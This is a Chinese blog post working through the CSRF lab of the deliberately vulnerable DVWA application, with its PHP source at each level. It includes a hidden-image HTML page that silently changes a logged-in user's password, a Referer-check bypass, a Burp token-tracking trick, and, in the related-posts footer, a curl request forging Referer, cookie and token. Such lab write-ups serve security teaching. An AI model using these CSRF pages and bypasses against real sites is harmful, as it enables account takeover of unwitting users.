DVWA-CSRF

最新推荐文章于 2024-01-23 17:22:29 发布
最新推荐文章于 2024-01-23 17:22:29 发布
阅读量1.7k 收藏 1
点赞数
分类专栏: web 文章标签: csrf web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Ga4ra/article/details/123362906
版权

文章目录

CSRF

之前的笔记:https://blog.csdn.net/Ga4ra/article/details/122060519

Low level

题目是一个修改密码的页面,修改密码点击提交,url如下:

/dvwa/vulnerabilities/csrf/?password_new=aaa&password_conf=aaa&Change=Change#

这个页面任意访问,就能修改密码了。

构造个页面:

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
</head>
<body>
    <img src="http://10.10.10.156/dvwa/vulnerabilities/csrf/?password_new=bbb&password_conf=bbb&Change=Change#" border=“0” style=“display:none;”/>

    <h1>404<h1>
</body>
</html>

一旦访问这个页面,密码就会被改成bbb了。

当然必须得先登录,否则dvwaPageStartup()函数会跳转到登录页面。

看下源码,只是检查了password_new和password_conf一样即可修改。

<?php

if( isset( $_GET[ 'Change' ] ) ) {
	// Get input
	$pass_new  = $_GET[ 'password_new' ];
	$pass_conf = $_GET[ 'password_conf' ];

	// Do the passwords match?
	if( $pass_new == $pass_conf ) {
		// They do!
		$pass_new = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $pass_new ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
		$pass_new = md5( $pass_new );

		// Update the database
		$insert = "UPDATE `users` SET password = '$pass_new' WHERE user = '" . dvwaCurrentUser() . "';";
		$result = mysqli_query($GLOBALS["___mysqli_ston"],  $insert ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );

		// Feedback for the user
		$html .= "<pre>Password Changed.</pre>";
	}
	else {
		// Issue with passwords matching
		$html .= "<pre>Passwords did not match.</pre>";
	}

?>

Medium level

这次如果从空白页/恶意网站直接访问修改密码的url,则会回显That request didn't look correct.

看下源码,检查了referer字段:

// Checks to see where the request came from
	if( stripos( $_SERVER[ 'HTTP_REFERER' ] ,$_SERVER[ 'SERVER_NAME' ]) !== false ) {
		// Get input
		$pass_new  = $_GET[ 'password_new' ];
		$pass_conf = $_GET[ 'password_conf' ];

		//...
		}
		else {
			// ...
		}
	}

如果referer里有服务端hostname,则通过验证。

抓包看下字段

访问的url:

http://10.10.10.156/dvwa/vulnerabilities/csrf/?password_new=123456&password_conf=123456&Change=Change#

Referer

Referer: http://10.10.10.156/dvwa/vulnerabilities/csrf/?password_new=123&password_conf=123&Change=Change

修改下源码:

echo $_SERVER[ 'SERVER_NAME' ];
echo "<br>";
echo $_SERVER[ 'HTTP_REFERER' ];
if( stripos( $_SERVER[ 'HTTP_REFERER' ] ,$_SERVER[ 'SERVER_NAME' ]) !== false ) {
	//...
}

输出:

10.10.10.156
http://10.10.10.156/dvwa/vulnerabilities/csrf/?password_new=123&password_conf=123&Change=Change<!DOCTYPE html>

而从空白页访问url的时候,抓包是没有referer字段的,复制进去就可以修改密码了,当然实战中不能这么操作。一种绕过思路是,把low level里的html名称改成10.10.10.156.html。

High level

提交表单后url增加了user_token参数:

GET /dvwa/vulnerabilities/csrf/?password_new=123&password_conf=123&Change=Change&user_token=e41ef3299708ca39e988d6e194a0e349 HTTP/1.1

也就是说加入了token检查,F12前端页面如下:

<form action="#" method="GET">
    New password:<br />
    <input type="password" AUTOCOMPLETE="off" name="password_new"><br />
    Confirm new password:<br />
    <input type="password" AUTOCOMPLETE="off" name="password_conf"><br />
    <br />
    <input type="submit" value="Change" name="Change">
    <input type='hidden' name='user_token' value='e41ef3299708ca39e988d6e194a0e349' />
</form>

看下源码:

if ($change) {
	// Check Anti-CSRF token
	checkToken( $token, $_SESSION[ 'session_token' ], 'index.php' );

	// Do the passwords match?
	if( $pass_new == $pass_conf ) {
        //...
    }
    //...
}
generateSessionToken();


function generateSessionToken() {  # Generate a brand new (CSRF) token
	if( isset( $_SESSION[ 'session_token' ] ) ) {
		destroySessionToken();
	}
	$_SESSION[ 'session_token' ] = md5( uniqid() );
}

function checkToken( $user_token, $session_token, $returnURL ) {  # Validate the given (CSRF) token
	if( $user_token !== $session_token || !isset( $session_token ) ) {
		dvwaMessagePush( 'CSRF token is incorrect' );
		dvwaRedirect( $returnURL );
	}
}

单单抓包的话,可以使用bp的CSRF Token Tracker插件。添加规则:

host-> 10.10.10.156
name->user_token

然后抓包后发到repeater,无论发多少次,token都能自动刷新,返回password changed 响应。

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-oh4C9hhI-1646743782722)(CSRF.assets/BpCSRFTokenPlugin.png)]

Impossible level

Impossible级别需要先输入当前密码,而且查询数据库是用了PDO(PHP data object),防止sql注入。

<?php

if( isset( $_GET[ 'Change' ] ) ) {
	// Check Anti-CSRF token
	checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );

	// Get input
	$pass_curr = $_GET[ 'password_current' ];
	$pass_new  = $_GET[ 'password_new' ];
	$pass_conf = $_GET[ 'password_conf' ];

	// Sanitise current password input
	$pass_curr = stripslashes( $pass_curr );
	$pass_curr = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $pass_curr ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
	$pass_curr = md5( $pass_curr );

	// Check that the current password is correct
	$data = $db->prepare( 'SELECT password FROM users WHERE user = (:user) AND password = (:password) LIMIT 1;' );
	$data->bindParam( ':user', dvwaCurrentUser(), PDO::PARAM_STR );
	$data->bindParam( ':password', $pass_curr, PDO::PARAM_STR );
	$data->execute();

	// Do both new passwords match and does the current password match the user?
	if( ( $pass_new == $pass_conf ) && ( $data->rowCount() == 1 ) ) {
		// It does!
		$pass_new = stripslashes( $pass_new );
		$pass_new = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $pass_new ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
		$pass_new = md5( $pass_new );

		// Update database with new password
		$data = $db->prepare( 'UPDATE users SET password = (:password) WHERE user = (:user);' );
		$data->bindParam( ':password', $pass_new, PDO::PARAM_STR );
		$data->bindParam( ':user', dvwaCurrentUser(), PDO::PARAM_STR );
		$data->execute();

		// Feedback for the user
		$html .= "<pre>Password Changed.</pre>";
	}
	else {
		// Issue with passwords matching
		$html .= "<pre>Passwords did not match or current password incorrect.</pre>";
	}
}

// Generate Anti-CSRF token
generateSessionToken();

?>
CodeStarr
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
DVWA-master.7z 压缩包
09-14
- 跨站请求伪造(CSRF):攻击者利用用户的已登录状态,诱使用户进行非预期的操作。 - 文件包含漏洞:允许攻击者将外部文件内容包含到应用中,可能导致代码执行或信息泄露。 - 弱认证与会话管理:不安全的登录机制或...
DVWA--CSRF(初中高)
firecjh的博客
06-09 1109
构造的攻击页面命名成含受害者主机ip的名字。这样referer就能包含了主机名。只要referer中有这个ip,就能绕过。给出自己的截图过程。3)利用存储型XSS-高级,获取token。2)使用bp抓包,修改referer。4)替换token,修改密码成功。分析中级做了什么过滤。中级使用第二种方法,让。在攻击机创建恶意网页。
http referer导致无法跳转第三方的网页
yuyajun06的博客
03-22 2326
 问题描述:因业务需要,需要从自己公司网页收集数据到后台,然后再次重定向第三方jsp页面,但是在项目中,无法如何请求都无法跳转成功,每次都是404问题原因:抓包分析:1.从项目中重定向失败,抓包;2.直接在浏览器中访问第三方网页成功,抓包;对比数据流,发现失败的包中多了referer字段,这个字段携带你自己的路径,比如a访问b,referer会把a的地址送给b,这是http协议做的事情。问题解决方...
http请求不带referer的解决方法
woliuqiangdong的博客
09-09 3866
因业务需要,需要从富贵论坛收集数据到后台,然后再次重定向第三方jsp页面,但是在项目中,无法如何请求都无法跳转成功,每次都是404 问题原因: 抓包分析:1.从项目中重定向失败,抓包;2.直接在浏览器中访问第三方网页成功,抓包;对比数据流,发现失败的包中多了referer字段,这个字段携带你自己的路径,比如a访问b,referer会把a的地址送给b,这是http协议做的事情。 问题解决方案: 1.在你的form表单提交的页面加上 2.a标签请求的话,a标签有一个属性,ref="noreferrer
DVWA-CSRF攻略
真正的大师,永远都怀着一颗学徒的心。
07-28 550
文章目录一、CSRF简介二、LOW三、MediumHigh 一、CSRF简介 跨站请求伪造(Cross Site Request Forgery,CSRF)。 CSRF 是一种攻击,它强制终端用户在当前对其进行身份验证后(登陆 cookie session)的Web 应用程序上执行,非本意操作的攻击。CSRF 攻击的重点在于更改状态的请求,而不是盗取数据,因为攻击者无法查看伪造请求的响应。借助于社工的一些帮助,例如,通过电子邮件或聊天发送链接,攻击者可以诱骗用户执行攻击者选择的操作。如果受害者是普通用户,
DVWACSRF
RexHa的博客
09-30 7497
CSRF,跨站域请求伪造,通常攻击者会伪造一个场景(例如一条链接),来诱使用户点击,用户一旦点击,黑客的攻击目的也就达到了,他可以盗用你的身份,以你的名义发送恶意请求。
DVWA-CSRF(跨站请求伪造)
qq_45751902的博客
04-25 2481
目录CSRF(跨站请求伪造)简介安全级别:Low安全级别:Medium安全级别:High安全级别:Impossible CSRF(跨站请求伪造)简介 概念 CSRF(Cross—site request forgery),跨站请求伪造,是指利用受害者未失效的身份认证信息(cookie,会话等),诱骗其点击恶意链接或者访问包含攻击代码的页面,在受害人不知情的情况下,以受害者的身份向(身份认证信息所对应的)服务器发送请求,从而完成非法操作(如转账,改密等)。 CSRF与XSS的区别 CSRF属于业务逻辑漏洞
DVWA-master.zip
01-04
除了上述常见漏洞外,DVWA还包括如“弱口令”、“CSRF(跨站请求伪造)”、“不安全的直接对象引用”等其他安全挑战,这些都为学习者提供了全面的安全训练。 7. **实践与挑战** 通过DVWA,你可以模拟黑客的攻击...
DVWA-master安装包
02-28
3. **跨站请求伪造(CSRF)**:攻击者诱导用户执行非预期的操作,比如更改密码或转账,因为请求看起来像是来自用户自己。 4. **文件包含漏洞**:当程序允许用户指定要加载的文件时,不正确的验证可能导致恶意文件被...
DVWA-2.0.1
09-23
DVWA(Damn Vulnerable Web Application)是一个开源的Web应用程序,旨在为安全专业人员提供一个环境,以便在受控环境中学习和实践网络安全测试技术。DVWA 2.0.1是该应用的一个版本,包含了多种常见的Web应用漏洞,...
DVWACSRF漏洞(详细)
热门推荐
qq_44720671的博客
07-26 2万+
CSRF简介 csrf全称为:Cross-site request forgery,是一种常见的web攻击。在场景中,攻击者会伪造一个请求(通常是一个链接),然后欺骗目标用户点击,用户一旦点击,攻击也就完成了。 与xss的区别:csrf是借助用户的权限完成攻击,攻击者并没有拿到权限;而xss是直接盗取用户权限去进行破坏。 更改难度: 点击dvwa security,选择难度,然后点击submit...
DVWA——CSRF
weixin_51559599的博客
11-13 1301
这样解决了上种方法在请求中加入 token 的不便,同时,通过 XMLHttpRequest 请求的地址不会被记录到浏览器的地址栏,也不用担心 token 会透过 Referer 泄露到其他网站中去。可以在 HTTP 请求中以参数的形式加入一个随机产生的 token,并在服务器端建立一个拦截器来验证这个 token,如果请求中没有 token 或者 token 内容不正确,则认为可能是 CSRF 攻击而拒绝该请求。可以利用这一点漏洞,可以想办法在恶意网站的地址中添加带有 Web1 主机地址的字段。
DVWA简介及靶场实战-CSRF跨站请求伪造
最新发布
mmxhappy的专栏
01-23 1683
CSRF攻击的本质是重要操作的所有参数,都可以被攻击者猜测到,所以token值是必须的。观察以下源码,这是添加了Anti-CSRF token机制,用户每次到改密页面的时候,服务器会返回一个随机token,向服务器发起请求需要提交token参数,而在服务器收到请求的时候,会优先检查token,只有token正确才会处理客户端请求。本质上,这样的逻辑代码设计本身就不合理,HTTP协议设计的初衷中,GET型请求就需要保证“幂等性”,即无论发出了多少次GET请求,和仅发出一次请求所产生的效果应该是相同的。
DVWACSRF
weixin_42075643的博客
02-20 702
CSRF:跨站点请求伪造(Cross—Site Request Forgery) 也被称为 one-click attack 或者 session riding,通常缩写为 CSRF 或者 XSRF, 是一种冒充合法用户在当前登录或登录过的且登录信息尚未过期的Web浏览器或者应用程序上执行恶意的操作的攻击方法。跟跨站脚本(XSS)相比,XSS 利用的是用户对指定网站的信任,CSRF 利用的是网站对用户网页浏览器的信任。 漏洞原理: 合法路人甲登录网站A,登录成功后,服务器返回一个存有用户登录信息的coo.
DVWA靶场之CSRF通关详解
qq_62169455的博客
06-27 2892
CSRF的形成原因主要是由于Web应用程序没有充分验证请求来源的问题。正常的请求必须携带正确的Cookie信息,而攻击者可以构造一个恶意网站,在其中包含一个发送CSRF请求的链接或表单,当用户访问这个网站时,浏览器会自动发送CSRF请求到被攻击的网站,从而实现攻击。这查看源码,与刚刚的low等级比较发现,这只有一个等级发生了改变,即在传入密码和确认密码参数前先进行了一个if语句的判断,判断面的内容主要是验证这个访问请求是否从dvwa网站本身发起的,如果不是这个网站发起的请求,后面的操作就不执行。
DVWA学习之CSRF(跨站请求伪造)
weixin_40950781的博客
08-18 1107
DVWA学习之CSRFCSRF(Cross-site request forgery,跨站请求伪造)0x01 何为CSRF?0x02 CSRF原理0x03 low级别0x04 medium级别0x05 high级别0x06 impossible级别0x07 CSRF防御服务端的防御验证HTTP Referer字段在请求地址中添加token并验证在HTTP头中自定义属性并验证用户端的防御安全设备的防...
DVWA系列---CSRF(Cross Site Request Forgery)跨站请求伪造
野原新之助
01-26 487
文章目录一、前言CSRF二、Low级别1、演示2、源码三、Medium级别1、演示2、源码四、High级别1、演示 一、前言 CSRF CSRF(Cross Site Request Forgery)名为“跨站请求伪造”,意思是黑客伪装成用户的身份,利用目标服务器对用户的信任(即用户已经登入,且存有Cookie)进行数据请求或数据更改,达到攻击的目的。 CSRF形成的原因: 1、用户在登陆了网站后...
DVWA靶机通关攻略第三关——CSRF攻击
小飞飞的博客
03-09 956
DVWA靶机通关攻略请求伪造详细教学
DVWA-CSRF全级别教程
weixin_44716769的博客
09-08 3619
CSRF Low等级 查看源码 服务器收到修改密码的请求后,会检查参数password_new与password_conf是否相同,如果相同,就会修改密码,并没有任何的防CSRF机制(当然服务器对请求的发送者是做了身份验证的,是检查的cookie,只是这的代码没有体现)。 构造链接 http://192.168.0.103/vulnerabilities/csrf/?password_new=zuowenyang&password_conf=zuowenyang&Change=Chang
复现关于dvwaCSRF-token绕过实验
05-05
首先,我们需要在本地搭建一个DVWA环境。DVWA是一个漏洞练习平台,可以用于学习和测试Web应用程序的安全性。您可以从以下网站下载DVWA并进行安装:https://github.com/ethicalhack3r/DVWA。 接下来,我们需要绕过CSRF-token进行攻击。CSRF-token是一种防止CSRF攻击的措施,它是一个随机生成的字符串,用于验证请求是否来自合法的来源。在DVWA中,我们可以通过修改一个cookie来绕过CSRF-token。 下面是具体的攻击步骤: 1. 打开DVWA,登录并进入CSRF实验页面。 2. 在Chrome浏览器中打开开发者工具,切换到“Network”选项卡,勾选“Preserve log”选项。 3. 在实验页面中点击“View Source”按钮,查看页面源代码。 4. 在源代码中找到与CSRF-token相关的代码,我们可以看到以下代码: ``` <input type="hidden" name="user_token" value="<?php echo $_SESSION['user_token']; ?>"> ``` 5. 复制CSRF-token,它通常位于name="user_token"的input标签中,value属性的值为一个长字符串。 6. 在开发者工具中找到与此页面对应的请求,点击它打开请求详情。 7. 在请求详情中找到Cookie选项卡,找到名为“PHPSESSID”的cookie并复制它的值。 8. 使用一个新的浏览器标签打开一个在线表单生成器,例如:https://www.123formbuilder.com/free-form-templates/Online-Order-Form-3578911/。 9. 在表单生成器中创建一个POST表单,将请求方法设置为POST,并填写以下表单字段: ``` action: http://your-dvwa-site.com/vulnerabilities/csrf/ amount: 1000 ``` 10. 在开发者工具中找到此页面对应的请求,复制请求头中的所有内容。 11. 使用curl或其他工具发送POST请求,将以上内容作为请求头发送,例如: ``` curl -X POST 'http://your-dvwa-site.com/vulnerabilities/csrf/' \ -H 'Cookie: PHPSESSID=your-session-id-here' \ -H 'Content-Type: application/x-www-form-urlencoded' \ -H 'Referer: http://your-dvwa-site.com/vulnerabilities/csrf/' \ -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36' \ -H 'Upgrade-Insecure-Requests: 1' \ -H 'Origin: http://your-dvwa-site.com' \ -H 'Accept-Encoding: gzip, deflate' \ -H 'Accept-Language: en-US,en;q=0.9' \ -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8' \ --data 'user_token=your-csrf-token-here&amount=1000&action=transfer' ``` 12. 您应该会看到成功的响应。 总之,这个实验展示了CSRF攻击的危害性以及如何绕过CSRF-token进行攻击。在实际应用中,我们应该采取更加安全的措施来防止CSRF攻击,例如使用双重身份验证或者更加严格的CSRF-token验证。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值